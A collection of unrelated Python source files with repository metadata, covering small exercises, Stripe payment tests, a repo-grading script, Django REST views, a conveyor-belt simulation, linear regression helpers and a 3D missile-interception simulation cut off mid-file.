] | null | null | null |
# Exercise 10
# Determine the number of words in a user input
# and the average word length.

def anzahlwoerter(nutzereingabe):
    nutzereingabe_splitted = nutzereingabe.split(" ")
    return nutzereingabe_splitted

def wortlaenge(nutzereingabe, nutzereingabe_splitted):
    # Average the lengths of the words themselves so that the
    # separating spaces do not inflate the result.
    durchschnittliche_wortlaenge = sum(len(wort) for wort in nutzereingabe_splitted) / len(nutzereingabe_splitted)
    return durchschnittliche_wortlaenge

nutzereingabe = input("Please enter a sentence: ")
gesplittete_nutzereingabe = anzahlwoerter(nutzereingabe)
print("The number of words in your sentence is:", len(gesplittete_nutzereingabe))
print("The average word length is:", wortlaenge(nutzereingabe, gesplittete_nutzereingabe), "characters.")
| 43 | 116 | 0.813953 |
59cbbc4f1bccb433ec6db3cace8d7db4c1681797
| 210 |
py
|
Python
|
Contrib-Inspur/openbmc/poky/meta/lib/oeqa/utils/network.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 5 |
2019-11-11T07:57:26.000Z
|
2022-03-28T08:26:53.000Z
|
Contrib-Inspur/openbmc/poky/meta/lib/oeqa/utils/network.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 3 |
2019-09-05T21:47:07.000Z
|
2019-09-17T18:10:45.000Z
|
Contrib-Inspur/openbmc/poky/meta/lib/oeqa/utils/network.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 11 |
2019-07-20T00:16:32.000Z
|
2022-01-11T14:17:48.000Z
|
#
# SPDX-License-Identifier: MIT
#
import socket
def get_free_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))
addr = s.getsockname()
s.close()
return addr[1]
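# Usage sketch (illustrative addition): reserve an ephemeral port for a test server.
if __name__ == '__main__':
    print('free TCP port:', get_free_port())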
| 16.153846 | 57 | 0.638095 |
e64816b9e75a4d5ea71c4e176143e09a34fe5ff2
| 142 |
py
|
Python
|
1_Datentypen/02_listen/list.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
1_Datentypen/02_listen/list.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
1_Datentypen/02_listen/list.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
# Basics
####### List methods
# copying lists and their pitfalls
# proper copying is done via copy()
# Slicing
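# A minimal sketch (added for illustration, not part of the original course
# stub) of the copy pitfall and the fixes hinted at in the comments above:
a = [1, 2, 3]
b = a           # no copy: both names refer to the same list object
b.append(4)     # the change is visible through `a` as well
c = a.copy()    # proper shallow copy via copy()
d = a[:]        # slicing also produces a shallow copy
print(a, b, c, d)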
| 9.466667 | 38 | 0.697183 |
056b2723acac25910d1251a9850c610b41323569
| 6,042 |
py
|
Python
|
tests/onegov/org/test_views_stripe.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/org/test_views_stripe.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/org/test_views_stripe.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
import textwrap
import requests_mock
import transaction
from purl import URL
from onegov.form import FormCollection
from onegov.pay import PaymentProviderCollection
def test_setup_stripe(client):
client.login_admin()
assert client.app.default_payment_provider is None
with requests_mock.Mocker() as m:
m.post('https://oauth.example.org/register/foo', json={
'token': '0xdeadbeef'
})
client.get('/payment-provider').click("Stripe Connect")
url = URL(m.request_history[0].json()['url'])
url = url.query_param('oauth_redirect_secret', 'bar')
url = url.query_param('code', 'api_key')
m.post('https://connect.stripe.com/oauth/token', json={
'scope': 'read_write',
'stripe_publishable_key': 'stripe_publishable_key',
'stripe_user_id': 'stripe_user_id',
'refresh_token': 'refresh_token',
'access_token': 'access_token',
})
client.get(url.as_string())
provider = client.app.default_payment_provider
assert provider.title == 'Stripe Connect'
assert provider.publishable_key == 'stripe_publishable_key'
assert provider.user_id == 'stripe_user_id'
assert provider.refresh_token == 'refresh_token'
assert provider.access_token == 'access_token'
def test_stripe_form_payment(client):
collection = FormCollection(client.app.session())
collection.definitions.add('Donate', definition=textwrap.dedent("""
E-Mail *= @@@
Donation *=
(x) Small (10 CHF)
( ) Medium (100 CHF)
"""), type='custom', payment_method='free')
providers = PaymentProviderCollection(client.app.session())
providers.add(type='stripe_connect', default=True, meta={
'publishable_key': '0xdeadbeef',
'access_token': 'foobar'
})
transaction.commit()
page = client.get('/form/donate')
page.form['e_mail'] = '[email protected]'
page = page.form.submit().follow()
assert "Totalbetrag" in page
assert "10.00 CHF" in page
assert "+ 0.59" not in page
assert "Online zahlen und abschliessen" in page
button = page.pyquery('.checkout-button')
assert button.attr('data-stripe-amount') == '1000'
assert button.attr('data-stripe-currency') == 'CHF'
assert button.attr('data-stripe-email') == '[email protected]'
assert button.attr('data-stripe-description') == 'Donate'
assert button.attr('data-action') == 'submit'
assert button.attr('data-stripe-allowrememberme') == 'false'
assert button.attr('data-stripe-key') == '0xdeadbeef'
with requests_mock.Mocker() as m:
charge = {
'id': '123456'
}
m.post('https://api.stripe.com/v1/charges', json=charge)
m.get('https://api.stripe.com/v1/charges/123456', json=charge)
m.post('https://api.stripe.com/v1/charges/123456/capture', json=charge)
page.form['payment_token'] = 'foobar'
page.form.submit().follow()
with requests_mock.Mocker() as m:
m.get('https://api.stripe.com/v1/charges/123456', json={
'id': '123456',
'captured': True,
'refunded': False,
'paid': True,
'status': 'foobar'
})
client.login_admin()
ticket = client.get('/tickets/ALL/open').click('Annehmen').follow()
assert "Bezahlt" in ticket
payments = client.get('/payments')
assert "FRM-" in payments
assert "Stripe Connect" in payments
assert "[email protected]" in payments
assert "9.41 CHF" in payments
assert "0.59" in payments
def test_stripe_charge_fee_to_customer(client):
collection = FormCollection(client.app.session())
collection.definitions.add('Donate', definition=textwrap.dedent("""
E-Mail *= @@@
Donation *=
(x) Small (10 CHF)
( ) Medium (100 CHF)
"""), type='custom', payment_method='free')
providers = PaymentProviderCollection(client.app.session())
providers.add(type='stripe_connect', default=True, meta={
'publishable_key': '0xdeadbeef',
'access_token': 'foobar',
'user_id': 'foobar'
})
transaction.commit()
client.login_admin()
with requests_mock.Mocker() as m:
m.get('https://api.stripe.com/v1/accounts/foobar', json={
'business_name': 'Govikon',
'email': '[email protected]'
})
page = client.get('/payment-provider').click("Einstellungen", index=1)
assert 'Govikon / [email protected]' in page
page.form['charge_fee_to_customer'] = True
page.form.submit()
page = client.get('/form/donate')
page.form['e_mail'] = '[email protected]'
page = page.form.submit().follow()
assert "Totalbetrag" in page
assert "10.00 CHF" in page
assert "+ 0.61 CHF Kreditkarten-Gebühr" in page
assert "Online zahlen und abschliessen" in page
button = page.pyquery('.checkout-button')
assert button.attr('data-stripe-amount') == '1061'
with requests_mock.Mocker() as m:
charge = {
'id': '123456'
}
m.post('https://api.stripe.com/v1/charges', json=charge)
m.get('https://api.stripe.com/v1/charges/123456', json=charge)
m.post('https://api.stripe.com/v1/charges/123456/capture', json=charge)
page.form['payment_token'] = 'foobar'
page.form.submit().follow()
with requests_mock.Mocker() as m:
m.get('https://api.stripe.com/v1/charges/123456', json={
'id': '123456',
'captured': True,
'refunded': False,
'paid': True,
'status': 'foobar'
})
client.login_admin()
ticket = client.get('/tickets/ALL/open').click('Annehmen').follow()
assert "Bezahlt" in ticket
payments = client.get('/payments')
assert "FRM-" in payments
assert "Stripe Connect" in payments
assert "[email protected]" in payments
assert "10.00" in payments
assert "0.61" in payments
| 31.8 | 79 | 0.621483 |
55bfc7818aa8a05d043b5108689fcc5d932be692
| 739 |
py
|
Python
|
Packs/CommonScripts/Scripts/AddDBotScoreToContext/AddDBotScoreToContext.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CommonScripts/Scripts/AddDBotScoreToContext/AddDBotScoreToContext.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CommonScripts/Scripts/AddDBotScoreToContext/AddDBotScoreToContext.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
def main():
indicator = demisto.args().get("indicator")
indicatorType = demisto.args().get("indicatorType")
score = int(demisto.args().get("score"))
vendor = demisto.args().get("vendor")
reliability = demisto.args().get("reliability", None)
dbotscore = {
"Indicator": indicator,
"Type": indicatorType,
"Vendor": vendor,
"Score": score,
"Reliability": reliability
}
command_results = CommandResults(
outputs_prefix='DBotScore',
outputs=dbotscore
)
return_results(command_results)
if __name__ == "__builtin__" or __name__ == "builtins":
main()
| 25.482759 | 57 | 0.635995 |
ddf9ac169d140abae128b95a53b90bd57ee92765
| 108 |
py
|
Python
|
codeit/algorithm/util.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
codeit/algorithm/util.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
codeit/algorithm/util.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
def test_value(result, answer):
print(f'result: {result}, answer: {answer}')
assert result == answer
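# Usage sketch (illustrative addition, with hypothetical values):
if __name__ == "__main__":
    test_value(2 + 2, 4)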
| 36 | 48 | 0.675926 |
fb13ee8a809350a976e17c58ff2ac4031d8ab41a
| 697 |
py
|
Python
|
grader/tools/grade-from-links.py
|
LammingerL/selfie
|
93a094b6b33be000192e0eab946a462a3291907c
|
[
"BSD-2-Clause"
] | null | null | null |
grader/tools/grade-from-links.py
|
LammingerL/selfie
|
93a094b6b33be000192e0eab946a462a3291907c
|
[
"BSD-2-Clause"
] | null | null | null |
grader/tools/grade-from-links.py
|
LammingerL/selfie
|
93a094b6b33be000192e0eab946a462a3291907c
|
[
"BSD-2-Clause"
] | null | null | null |
import sys
import os
if len(sys.argv) == 4:
filename = sys.argv[1]
target = sys.argv[2]
assignment = sys.argv[3]
else:
print "usage: python grade-from-links.py text-file-with-github-links directory-where-repos-are assignment"
sys.exit(1)
file = open(filename, "r")
os.chdir(target)
for link in file.readlines():
link = link.replace("\n", "").split("/")
user = link[3]
repo = link[4]
commit = link[6]
print "\n\n" + user + "/" + repo + ":"
os.chdir(user)
os.chdir(repo)
os.system("git fetch")
os.system("git checkout " + commit)
os.system("make")
os.system("python3 grader/self.py " + assignment)
os.chdir(os.path.pardir)
os.chdir(os.path.pardir)
file.close()
| 18.837838 | 107 | 0.649928 |
34e93761ac699bc1a45aad8d542a8501afee2d5f
| 1,375 |
py
|
Python
|
docker/django/restaurant/restapps/views/views.py
|
gitmehedi/cloudtuts
|
3008b1cf7fbf22728c9bb2c059c4bd196043a93e
|
[
"Unlicense"
] | 3 |
2019-08-29T10:14:40.000Z
|
2021-03-05T09:50:15.000Z
|
docker/django/restaurant/restapps/views/views.py
|
gitmehedi/cloudtuts
|
3008b1cf7fbf22728c9bb2c059c4bd196043a93e
|
[
"Unlicense"
] | null | null | null |
docker/django/restaurant/restapps/views/views.py
|
gitmehedi/cloudtuts
|
3008b1cf7fbf22728c9bb2c059c4bd196043a93e
|
[
"Unlicense"
] | 1 |
2021-03-05T09:50:29.000Z
|
2021-03-05T09:50:29.000Z
|
from django.shortcuts import render
from rest_framework import status
from rest_framework.response import Response
from rest_framework.decorators import api_view
from .models import *
from .serializers import *
@api_view(['GET', 'POST'])
def api_restaurant_list_view(request):
restaurant = Restaurant.objects.all()
if request.method == 'GET':
serializer = RestaurantSerializer(restaurant, many=True)
return Response(serializer.data)
if request.method == 'POST':
data = {}
serializer = RestaurantSerializer(data=request.data['params'])
if serializer.is_valid():
serializer.save()
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors,status=status.HTTP_404_NOT_FOUND)
@api_view(['GET','POST'])
def api_menu_list_view(request):
menu = Menu.objects.all()
if request.method == 'GET':
serializer = MenuSerializer(menu,many=True)
return Response(serializer.data)
if request.method == 'POST':
data = {}
serializer = MenuSerializer(data=request.data['params'], many=True)
if serializer.is_valid():
serializer.save()
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors, status=status.HTTP_404_NOT_FOUND)
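# Request-shape sketch (illustrative addition; the exact fields depend on
# RestaurantSerializer and MenuSerializer, which are defined elsewhere):
# both POST handlers above read the payload from request.data['params'], e.g.
#   POST restaurants: {"params": {<RestaurantSerializer fields>}}
#   POST menus:       {"params": [{<MenuSerializer fields>}, ...]}  # many=True expects a list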
| 33.536585 | 80 | 0.679273 |
2f1966dacb6855ebe339bf13c45835286cb99037
| 2,234 |
py
|
Python
|
venv/Lib/site-packages/pynance/learn/linreg.py
|
LeonardoHMS/imobi
|
6b2b97a05df67ea7d493f7b601382f65c6629cc2
|
[
"MIT"
] | 35 |
2015-03-12T04:16:14.000Z
|
2020-12-17T18:10:15.000Z
|
venv/Lib/site-packages/pynance/learn/linreg.py
|
LeonardoHMS/imobi
|
6b2b97a05df67ea7d493f7b601382f65c6629cc2
|
[
"MIT"
] | 31 |
2015-03-16T21:31:04.000Z
|
2021-01-26T00:12:34.000Z
|
venv/Lib/site-packages/pynance/learn/linreg.py
|
LeonardoHMS/imobi
|
6b2b97a05df67ea7d493f7b601382f65c6629cc2
|
[
"MIT"
] | 18 |
2015-09-30T10:40:26.000Z
|
2021-01-25T21:20:44.000Z
|
"""
.. Copyright (c) 2014, 2015 Marshall Farrier
license http://opensource.org/licenses/MIT
Linear regression (:mod:`pynance.learn.linreg`)
===============================================
.. currentmodule:: pynance.learn.linreg
"""
import numpy as np
def run(features, labels, regularization=0., constfeat=True):
"""
Run linear regression on the given data.
.. versionadded:: 0.5.0
If a regularization parameter is provided, this function
is a simplification and specialization of ridge
regression, as implemented in `scikit-learn
<http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.Ridge.html#sklearn.linear_model.Ridge>`_.
Setting `solver` to `'svd'` in :class:`sklearn.linear_model.Ridge` and equating
our `regularization` with their `alpha` will yield the same results.
Parameters
----------
features : ndarray
Features on which to run linear regression.
labels : ndarray
Labels for the given features. Multiple columns
of labels are allowed.
regularization : float, optional
Regularization parameter. Defaults to 0.
constfeat : bool, optional
Whether or not the first column of features is
the constant feature 1. If True, the first column
will be excluded from regularization. Defaults to True.
Returns
-------
model : ndarray
Regression model for the given data.
"""
n_col = (features.shape[1] if len(features.shape) > 1 else 1)
reg_matrix = regularization * np.identity(n_col, dtype='float64')
if constfeat:
reg_matrix[0, 0] = 0.
# http://stackoverflow.com/questions/27476933/numpy-linear-regression-with-regularization
return np.linalg.lstsq(features.T.dot(features) + reg_matrix, features.T.dot(labels))[0]
def predict(features, model):
"""
Generate predictions from features and model.
.. versionadded:: 0.5.0
Parameters
----------
features : ndarray
Features from which to generate predictions
model : ndarray
Regression model.
Returns
-------
predicted : ndarray
Predictions generated from features using model.
"""
return features.dot(model)
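# A minimal usage sketch (illustrative addition, not part of the original
# module): fit y = 2x + 1 with a constant feature column and mild regularization.
if __name__ == '__main__':
    demo_features = np.column_stack([np.ones(5), np.arange(5.0)])
    demo_labels = 1.0 + 2.0 * np.arange(5.0)
    demo_model = run(demo_features, demo_labels, regularization=0.1)
    print(predict(demo_features, demo_model))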
| 29.786667 | 116 | 0.662936 |
c0b98c972917e6f1cb04039b8fcda0adb3320e7b
| 1,630 |
py
|
Python
|
algorithm/sorting_algorithms_in_python/bubble_sort.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
algorithm/sorting_algorithms_in_python/bubble_sort.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
algorithm/sorting_algorithms_in_python/bubble_sort.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
from random import randint
from sorting_timer import run_sorting_algorithm, ARRAY_LENGTH
def bubble_sort(array):
n = len(array)
for i in range(n):
# Create a flag that will allow the function to
# terminate early if there's nothing left to sort
already_sorted = True
        # Start looking at each item of the list one by one,
        # comparing it with its adjacent value. With each
        # iteration, the portion of the array that you look at
        # shrinks because the remaining items have already been
        # sorted.
for j in range(n - i - 1):
if array[j] > array[j + 1]:
# If the item you're looking at is greater than its
# adjacent value, then swap them
array[j], array[j + 1] = array[j + 1], array[j]
# Since you had to swap two elements,
# set the `already_sorted` flag to `False` so the
# algorithm doesn't finish prematurely
already_sorted = False
# If there were no swaps during the last iteration,
# the array is already sorted, and you can terminate
if already_sorted:
break
return array
if __name__ == "__main__":
# Generate an array of `ARRAY_LENGTH` items consisting
# of random integer values between 0 and 999
array = [randint(0, 1000) for i in range(ARRAY_LENGTH)]
# Call the function using the name of the sorting algorithm
# and the array you just created
run_sorting_algorithm(algorithm="bubble_sort", array=array)
| 36.222222 | 68 | 0.609202 |
c0d96859eecd3d674121156205f6ba9a78c359eb
| 361 |
py
|
Python
|
Chapter2_Basics/Strings.py
|
franneck94/UdemyPythonIntro
|
4895a91a04eedce7d59b61bf12e5aa209fe60f85
|
[
"MIT"
] | 2 |
2021-02-13T19:18:00.000Z
|
2021-11-10T09:54:49.000Z
|
Chapter2_Basics/Strings.py
|
franneck94/UdemyPythonIntro
|
4895a91a04eedce7d59b61bf12e5aa209fe60f85
|
[
"MIT"
] | null | null | null |
Chapter2_Basics/Strings.py
|
franneck94/UdemyPythonIntro
|
4895a91a04eedce7d59b61bf12e5aa209fe60f85
|
[
"MIT"
] | null | null | null |
name = "Jan Maximilan Schaffranek"
result = name.find("an")
if result == -1:
print("Not found")
else:
print("Found at index: ", result)
name2 = name.replace("Jan", "Yann")
print(name)
print(name2)
name3 = name.upper()
print(name3)
name4 = name.lower()
print(name4)
name5 = name.split(" ")
print(name5)
count = name.count("an")
print(count)
| 11.645161 | 37 | 0.642659 |
c0de37b7e234e77dbe1666c79be0886d512a7b89
| 1,914 |
py
|
Python
|
Praxisseminar/physical_process.py
|
EnjoyFitness92/Praxisseminar-SS2020
|
b5baba5d1512a5fad3391efc42f3ab232d79c4e2
|
[
"MIT"
] | null | null | null |
Praxisseminar/physical_process.py
|
EnjoyFitness92/Praxisseminar-SS2020
|
b5baba5d1512a5fad3391efc42f3ab232d79c4e2
|
[
"MIT"
] | 2 |
2020-06-24T13:01:22.000Z
|
2020-06-24T13:10:07.000Z
|
Praxisseminar/physical_process.py
|
EnjoyFitness92/Praxisseminar-SS2020
|
b5baba5d1512a5fad3391efc42f3ab232d79c4e2
|
[
"MIT"
] | null | null | null |
"""
WORK IN PROGRESS:
- in effect, the physical process only starts and stops the conveyor belt and determines the motor speed
Conveyor belt physical process
"""
from minicps.devices import Tank
from utils import STATE, MOTOR_VEL, Praxisseminar_test_logger
import sys
import time
# Praxisseminar TAGS
# Example: MV101 = ('MV101', 1)
MOTOR = ('MOTOR', 1)
SENSOR = ('SENSOR', 1)
# Praxisseminar TAGS
# The Tank class is used here because our own class is not on the Python path
class ConveyorBelt(Tank):
def pre_loop(self, sleep=0.1):
# Praxisseminar STATE INIT(
        # By default the conveyor belt motor is on
get_m11 = self.get(MOTOR)
Praxisseminar_test_logger.info('Motor: ' + str(get_m11))
# Praxisseminar STATE INIT)
def main_loop(self, sleep=0.1):
count = 0
while True:
            # check whether the motor is on
            # if so, set the default initial speed
motor = self.get(MOTOR)
Praxisseminar_test_logger.info('Motor: ' + str(motor))
if int(motor) == 1:
new_velocity = self.get(SENSOR)
Praxisseminar_test_logger.info('Sensor: ' + str(new_velocity))
self.set(SENSOR, new_velocity)
                Praxisseminar_test_logger.info('Sensor data changed: ' + str(new_velocity))
                # DEBUG: default motor speed
            else:
                self.set(SENSOR, MOTOR_VEL['MIN'])
                Praxisseminar_test_logger.info('Sensor data changed: ' + str(MOTOR_VEL['MIN']))
time.sleep(sleep)
count += 1
if __name__ == '__main__':
# section, level, protocol???
cb = ConveyorBelt(
name='cb',
state=STATE,
protocol=None,
section=None,
level=None
)
| 24.857143 | 120 | 0.635319 |
7b4054c0fab1cb42e9849789454ddaa7ab4f1d54
| 349 |
py
|
Python
|
PINp/2014/Chernov_M_S/task_2_27.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PINp/2014/Chernov_M_S/task_2_27.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PINp/2014/Chernov_M_S/task_2_27.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Task 2. Variant 27.
# Write a program that prints the saying you like best
# whose author is Ovid. Do not forget that the author
# must be mentioned on a separate line.
# Chernov Mikhail Sergeevich
# 28.05.2016
print("Trust experience")
print("\n\t\tOvid")
input("\n\nPress Enter to exit.")
| 31.727273 | 76 | 0.765043 |
7b94e457a9e74ffbf8995bba913eb090c55bbf15
| 16,133 |
py
|
Python
|
GymFlight.py
|
kirtis26/Missile3D
|
23a868b34f7362dac5ce0dff254d990f4d0c4e92
|
[
"MIT"
] | null | null | null |
GymFlight.py
|
kirtis26/Missile3D
|
23a868b34f7362dac5ce0dff254d990f4d0c4e92
|
[
"MIT"
] | null | null | null |
GymFlight.py
|
kirtis26/Missile3D
|
23a868b34f7362dac5ce0dff254d990f4d0c4e92
|
[
"MIT"
] | null | null | null |
import numpy as np
from Missile3D import Missile3D
from Target3D import Target3D
import matplotlib.pyplot as plt
from easyvec import Vec3
class GymFlight(object):
scenario_names = {'standard', 'random', 'sample_1', 'sample_2', 'sample_3', 'sample_4'}
standard_target_opts = {
'pos': Vec3(8e3, 1.5e3, 0),
'pos_aim': Vec3(-100, 0, 100),
'vel': Vec3(-100, 10, 10),
'vel_aim': Vec3(-100, -10, -10)
}
sample_target_opts_1 = {
'pos': Vec3(10e3, 3e3, 3e3),
'pos_aim': Vec3(-100, 0, -1e3),
'vel': Vec3(-100, 10, -50),
'vel_aim': Vec3(-100, -10, -10)
}
sample_target_opts_2 = {
'pos': Vec3(10e3, 3e3, 0),
'pos_aim': Vec3(-100, 0, 0),
'vel': Vec3(-100, 10, 0),
'vel_aim': Vec3(-100, -10, 0)
}
sample_target_opts_3 = {
'pos': Vec3(20e3, 2e3, 0),
'pos_aim': Vec3(-1e3, 0, -10e3),
'vel': Vec3(-100, -10, -100),
'vel_aim': Vec3(-100, -10, -100)
}
sample_target_opts_4 = {
'pos': Vec3(10e3, 4e3, 3e3),
'pos_aim': Vec3(1e3, 0, -5e3),
'vel': Vec3(-100, -10, -10),
'vel_aim': Vec3(-10, -10, -100)
}
@classmethod
def make_simple_scenario(cls,
missile_opts,
target_opts,
tau=0.5,
ndt=10,
n_step=50,
t_max=50,
fly_time_min=False,
postProcessing=True):
mis = Missile3D.get_missile(missile_opts,
postProcessing=postProcessing)
trg = Target3D.get_simple_target(target_opts,
time_min=fly_time_min,
postProcessing=postProcessing)
mis.set_initial_parameters_of_missile(trg)
return cls(mis=mis, trg=trg, n_step=n_step, tau=tau, ndt=ndt, t_max=t_max)
@classmethod
def make_scenario(cls,
missile_opts,
scenario_name=None,
target_opts=None,
tau=0.5,
ndt=10,
n_step=50,
t_max=50,
fly_time_min=False,
postProcessing=True):
"""
        Class method that creates a target-motion scenario
        ----------
        arguments:
            missile_opts {dict} - dictionary with the missile parameters
            target_opts {dict} - dictionary with the target parameters (used when no named scenario is given)
            scenario_name {str} - name of the scenario
            tau {float} - simulation time step, s
            ndt {int} - number of sub-steps the interval tau is split into (number of integration steps)
            n_step {int} - maximum number of time steps tau
            t_max {float/int} - maximum flight time, s
            fly_time_min {bool} - flag for finding the minimum flight time from the maximum load factor
            postProcessing {bool} - post-process (record) the results into a data dictionary
        returns:
            {cls} - a GymFlight class object
"""
key_args = tau, ndt, n_step, t_max, fly_time_min, postProcessing
if scenario_name is not None and scenario_name not in cls.scenario_names:
raise AttributeError(f'Error! Unknown scenario: "{scenario_name}" \n'
f'Available scenarios: {cls.scenario_names}')
elif scenario_name is None:
if target_opts is None:
raise AttributeError(f'Error! Argument Key "target_opts" does not: "{target_opts}" \n'
f'Example: {cls.standard_target_opts}')
else:
return cls.make_simple_scenario(missile_opts, target_opts, *key_args)
elif scenario_name == 'standard':
return cls.make_simple_scenario(missile_opts, cls.standard_target_opts, *key_args)
elif scenario_name == 'random':
return cls.make_simple_scenario(missile_opts, Target3D.get_random_parameters(), *key_args)
elif scenario_name == 'sample_1':
return cls.make_simple_scenario(missile_opts, cls.sample_target_opts_1, *key_args)
elif scenario_name == 'sample_2':
return cls.make_simple_scenario(missile_opts, cls.sample_target_opts_2, *key_args)
elif scenario_name == 'sample_3':
return cls.make_simple_scenario(missile_opts, cls.sample_target_opts_3, *key_args)
elif scenario_name == 'sample_4':
return cls.make_simple_scenario(missile_opts, cls.sample_target_opts_4, *key_args)
def __init__(self, **kwargs):
"""
        GymFlight class constructor:
            missile - a Missile3D class object
            target - a Target3D class object
            n_step - number of tau steps over which the control action is constant
            tau - simulation step, s
            ndt - number of integration steps the time interval tau is split into
            t_max - maximum flight time, s
"""
self.missile = kwargs['mis']
self.target = kwargs['trg']
self.i_step = 0
self.n_step = kwargs['n_step']
self.tau = kwargs['tau']
self.ndt = kwargs['ndt']
self.t_max = kwargs['t_max']
self.history = None
def run(self, decr_tau=False, decr_n=100, decr_dist=500):
"""
        Class method that runs the simulation of the initialized scenario
argument: none
return: none
"""
done = False
while not done:
            self.step()
            self.i_step += 1
            done, info = self.get_info_about_step()
if decr_tau and self._r_() < decr_dist:
self.tau /= decr_n
self.missile.am = 1
decr_tau = False
print(f'Info launch missile: {info}')
self.history = {'missile': self.missile.history, 'target': self.target.history} if self.missile.postProcessing else self.get_state()
def reset(self):
"""
        Method that returns the missile and the target to their initial state
"""
self.missile.reset()
self.target.reset()
def step(self):
"""
        Method that advances the simulation by one time step tau, over which the control action on the missile is constant
"""
self.target.step(tau=self.tau, n=self.ndt)
self.missile.step(self.missile.get_action_proportional_guidance(self.target), tau=self.tau, n=self.ndt)
def get_info_about_step(self):
"""
        Method returning information about the completed time step tau - a check whether the simulation should stop
        returns:
            {bool}, {str} - stop flag, stop reason
"""
if self._r_() < self.missile.r_explosion:
return True, 'target defeat'
elif self.missile.t > 0 and self.missile.pos[1] <= 0:
return True, 'missile fail'
elif abs(self.missile.alpha_targeting) > 90 or abs(self.missile.betta_targeting) > 90:
return True, 'missile miss'
elif self.missile.t > self.t_max:
return True, 'long fly time'
elif self.i_step > self.n_step:
return True, 'count step max'
else:
return False, ''
def get_state(self):
"""
        Get the current missile and target parameters as a data dictionary
return: {dict}
"""
return {'missile': self.missile.state,
'target': self.target.state}
def to_dict(self):
"""
        Convert all missile and target parameters into a data dictionary
return: {dict}
"""
return {'missile': self.missile.to_dict(),
'target': self.target.to_dict()}
def plot(self, dpi=150,
ls_trg_full='--', ls_trg='-', ls_mis='-',
color_trg_full='darkorange', color_trg='red', color_mis='darkblue',
marker_meet='o', color_marker_meet='red', marker_size=15,
marker_trg='x', color_marker_trg='red', color_marker_size=30,
loc_legend='best', legend_size=8,
savefig=False,
):
traj = self.target.get_traject(self.target.fly_time)
res = self.to_dict()
plt.figure(dpi=dpi)
ax = plt.axes(projection='3d')
        ax.plot(traj[:, 0], traj[:, 2], traj[:, 1],
                ls=ls_trg_full, color=color_trg_full, label='Full target trajectory')
        ax.plot(res['target']['x'], res['target']['z'], res['target']['y'],
                ls=ls_trg, color=color_trg, label='Target trajectory')
        ax.plot(res['missile']['pos'][:, 0], res['missile']['pos'][:, 2], res['missile']['pos'][:, 1],
                ls=ls_mis, color=color_mis, label='Missile trajectory')
        ax.scatter(res['target']['x'][-1], res['target']['z'][-1], res['target']['y'][-1],
                   marker=marker_meet, color=color_marker_meet, s=marker_size, label='Intercept point')
        ax.scatter(traj[:, 0][-1], traj[:, 2][-1], traj[:, 1][-1],
                   marker=marker_trg, color=color_marker_trg, s=color_marker_size, label='Final target position')
        ax.set_xlabel('$X$, m')
        ax.set_ylabel('$Z$, m')
        ax.set_zlabel('$Y$, m')
ax.view_init(elev=20, azim=-150)
plt.legend(loc=loc_legend, fontsize=legend_size)
if savefig:
plt.savefig('scenario_render.jpg', dpi=dpi)
plt.show()
def plot_trajectory(self, figsize=(15, 5), fontsize=14, labelsize=12, labelpad=0, dpi=400, savefig=False):
res = self.to_dict()
fig = plt.figure(figsize=figsize)
ax_1 = fig.add_subplot(1, 3, 1)
ax_2 = fig.add_subplot(1, 3, 2)
ax_3 = fig.add_subplot(1, 3, 3)
        ax_1.plot(res['missile']['pos'][:, 0], res['missile']['pos'][:, 1], label='Missile trajectory')
